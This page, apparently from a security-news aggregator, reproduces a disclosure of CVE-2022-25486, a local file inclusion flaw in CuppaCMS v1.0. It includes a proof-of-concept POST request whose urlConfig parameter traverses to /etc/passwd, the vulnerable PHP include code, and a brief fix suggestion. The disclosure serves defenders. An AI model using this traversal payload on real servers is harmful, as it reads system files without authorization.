Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-25486: Unauthorized local file inclusion (LFI) vulnerability exists via the urlConfig parameter in /alerts/alertConfigField.php · Issue #25 · CuppaCMS/CuppaCMS

CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.

CVE
#vulnerability#php#auth

Product version:cuppaCMS v1.0 http://cuppacms.com/files/cuppa_cms.zip

poc

POST /alerts/alertConfigField.php
urlConfig=../../../../../../../../../../../../../../etc/passwd

analysis

location: /alerts/alertConfigField.php line 77

<?php include "…/components/table_manager/fields/config/".@$cuppa->POST(“urlConfig”); ?>
and $cuppa->POST

       // post
    public function POST($string){
                return $this->sanitizeString(@$_POST[$string]);
       }

go on

      public function sanitizeString($string){
                return htmlspecialchars(trim(@$string));
            }

so the post urlConfig without any lfi protected filter

Repair suggestions

you can check urlConfig ,for example check if it has … then refuse this request

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907